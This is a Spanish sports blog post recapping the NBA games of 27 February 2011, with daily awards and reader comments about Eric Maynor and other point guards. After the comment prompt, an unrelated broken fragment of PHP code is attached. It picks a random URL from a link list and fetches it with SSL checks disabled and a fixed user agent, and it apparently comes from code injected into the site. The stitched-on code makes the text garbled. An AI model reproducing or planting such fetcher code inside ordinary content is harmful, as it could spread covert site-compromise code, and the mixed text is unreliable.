La Crónica (27/02/2011)

28 de February de 2011 por TheDeerHunter

¡Espectacular jornada de carrusel NBA! Gran menú de partidos, duelos apretados, memorables actuaciones individuales,  duelos al amanecer, tremendas defensas, emoción, sorpresas, canastas imposibles, errores catastróficos, buzzer beaters… ¿Faltó algo para ser una velada de baloncesto perfecta? I love this game.

Empezó el asunto bien, con un Phoenix@Indiana que se decidió en la prórroga (110-108). Los Suns, con Grant Hill ejecutando como en sus mejores tardes, fueron un martillo pilón durante la primera parte. En la segunda, sin embargo, se ahogaron ante el ímpetu de los locales y la gran actuación de Granger y AJ Miles. Los Pacers lo tuvieron en su mano al final del reglamentario, pero un triple de Hill que les empató a falta de un minuto y un par de malos ataques condujo el choque al limbo. El tiempo extra siguió la misma tónica de los Suns mandando al inicio, esta vez con Frye de ejecutor. Tras la reacción de lndiana todo parecía indicar que se viviría un segundo OT. Una canasta increíble del propio Frye lo evitó en última instancia. Los Suns rozan la 8ª plaza del Oeste mientras que los Pacers se mantienen excesivamente cómodos en la 8ª del Este.

Después los Lakers visitaban la complicada plaza de Oklahoma. Empezaron pasándolo bastante mal pero reaccionaron desde la defensa. A Durant se le agria la leche del desayuno cada vez que ve la cabezota de Ron Artest. Sin sus nuevos pívots los Thunder sufrieron mucho ante Bynum-Pau-Odom. Con todo el duelo se resolvió por pequeños detalles. Un robo de Ron Ron y una falta en ataque forzada por Gasol (90-87).

Tras un Sixers@Cavs también muy igualado que ganaron los visitantes (95-91), pudimos disfrutar de una de esas actuaciones de otro tiempo por parte de Kevin Love, que para colmo le dio la victoria contra los Warriors (123-126). Después pudimos disfrutar de un duelo individual “por todo lo alto” Dwight Howard vs Kwane Brown, en el que los Magic dieron buena cuenta de Charlotte (86-100) y Stephen Jackson pasa a ser buen candidato para los mayores esfuerzos en vano.

Vimos las victorias de tres equipos enrachados. Los Mavs lograron la 6ª consecutiva en Toronto (114-96), con super-Nowitzki y su extraordinaria segunda unidad. Calderón rozó el triple doble. Los Rockets parecen volver a quererse meter en la pomada de postemporada con su 4º triunfo consecutivo. Lo hicieron a costa de unos Hornets que empiezan a verle las orejas al lobo y abren una fractura con los 4 primeros del Oeste (91-89). Por su parte, los Spurs doblegaron a Memphis con un último cuarto de Manudo apoteósico (88-95).

También pudimos disfrutar de un Melo vs LeBron sensacional. Los nuevos Knicks sorprendieron a Miami en su casa (91-86). Choque igualadísimo que también se resolvió por pequeños detalles y subidón moral impresionante para los de D’Antoni.

Finalmente los Blazers no pudieron con los Hawks en el Rose Garden a pesar de la vuelta de Camby y del debut de Wallace (90-83).

PREMIOS

MVP: ¡Qué gustazo supone darle el premio de mejor actuación del día a Kevin Love! Viendo la trayectoria de los Wolves, aún nos temíamos que los 37 puntos y 23 rebotes del ex de UCLA simplemente valieran para un “mayor esfuerzo en vano”. Y van 46 dobles-dobles consecutivos…

Rookie: Definitivamente el traspaso de Corey Brewer le ha sentado fantásticamente a Wesley Johnson. Anoche consiguió 17 puntos, 7 rebotes, 3 asistencias y 4 robos.

Sorpresa:Viejos rockeros nunca mueren. 37 puntos y una actuación clave en la prórroga de Grant Hill, permitieron a los Suns alzarse con la victoria frente los Pacers. Y que James Johnson sea titular por primera vez con los Raptors y acabe el partido con un completísima actuación de 8 puntos, 7 rebotes, 7 asistencias, 2 tapones y 2 robos, también sorprende un rato.

Decepción: Alguien comentaba hace unos días que los Celtics podían haber tratado de hacerse con Eric Maynor en el traspaso de Perkins para potenciar un poco su banquillo exterior. Ayer no tuvo precisamente un día sembrado. 0 de 6 en tiro y sólo un par de asistencias en 14 minutos.

Esfuerzo en vano: Los 33 puntos y 11 rebotes de Stephen Curry fueron insuficientes ante el montruoso partido de Kevin Love.

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. -=TheKing=- dice:
    #1

    Olé los suns y que bien Gortat, Fray y Hill. Con Nash la vida es más fácil o es que Gentry es un gran entrenador, juego muy dinámico muy rápido en circulación.

    Muy bien Harden en la derrota de Oklahoma. Por cierto Fisher defendiendo da pena.

      Citar

  2. Busky23 dice:
    #2

    Con la defensa y la desaparición de Westbrook en la segunda parte los Lakers sacaron adelante un partido que se les puso muy complicado al principio,la segunda parte tuvo olor a playoffs,con mucha estopa y canastas muy trabajadas,por los Lakers Artest parece que resurge de sus cenizas,correcto en el lanzamiento y enorme en defensa,con robo providencial al final,gran noticia para Lakers.
    En los Thunder esperaba el debut de los nuevos,y al final ninguno saltó al parquet,Perkins se dice que tiene para 2-3 semanas.
    Gran partido de Harden que para mi merece ya la titularidad y dejar a Sefo como recambio de Durant,Maynor ya puede andarse con ojo que Nate no se lo pondrá nada fácil.

    Es la cuarta vez que consigue más de 30 pts y 20 rebotes… récord del equipo aparte,lo que esta haciendo K.Love es de traca.
    Por ultimo,me reverencia a Grant Hill,sensacional.

      Citar

  3. Hynreck dice:
    #3

    Lo de Maynor lo dije yo, me parece un base muy válido, y creo que mejoraría a varios titulares de la liga.

    Por otro lado, lo del nivel de Vince Carter es denunciable.

      Citar

  4. Viva_Dirk dice:
    #4

    Hombre Hynreck, a mi no me disgusta nada Maynor, creo que tiene clase y ofensivamente es bueno, pero para mejorar a varios titulares de la liga primero tendrá que empatar con alguien, digo yo. Si uno de los primeros nombres que se te viene a la cabeza es Fisher, no lo digas, puesto que siempre acaba siendo mas una solución que un problema, asi que, lo que tiene que hacer Eric es aprovechar esos 15 minutitos por partido mejor de lo que lo hace.

      Citar

  5. Hynreck dice:
    #5

    Hombre sí, entre otros Fisher, pero tambien por decir nombres pues me viene a la cabeza Calderón, Sessions, Ridnour, Bibby, Chalmers…
    No he dicho que esté entre la élite de la liga ni mucho menos, es más creo que su sitio lo encontrará como un buen suplente en la liga. Pero tambien digo que hay PG’s titulares más limitados hoy por hoy que él.

      Citar

  6. Hynreck dice:
    #6

    Por cierto, si te interesa Maynor, por una tercera rondita lo hacemos.

      Citar

  7. TheDeerHunter dice:
    #7

    No creo que Maynor sea evidentemente mejor que esos bases que mencionas. En concreto Sessions está jugando mejor que nunca.

    Quizás sí respecto a Bibby… en un declive muy pronunciado. Y con Chalmers no sabemos, pero igual no es tan fácil hacer números en un equipo como los Heat.

    Y de Fisher… pues dale tiempo que aún la armará como todos los años. Medirle porque Westbrook le supere en velocidad como al 90% de los bases de la liga. El propio Kobe también se comió alguna que otra suya para morirse.

      Citar

  8. Scriers dice:
    #8

    A mí Maynor con respecto a esos que nombras, solo me gusta más que Chalmers, y rozándose. Creo que Ridnour y Calderón son bastante mejores. Y Sessions lo veo también por encima. En fin, es que Maynor habría que juzgarle si consigue 10 minutos más por partido en, digamos, 5 o 6 partidos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>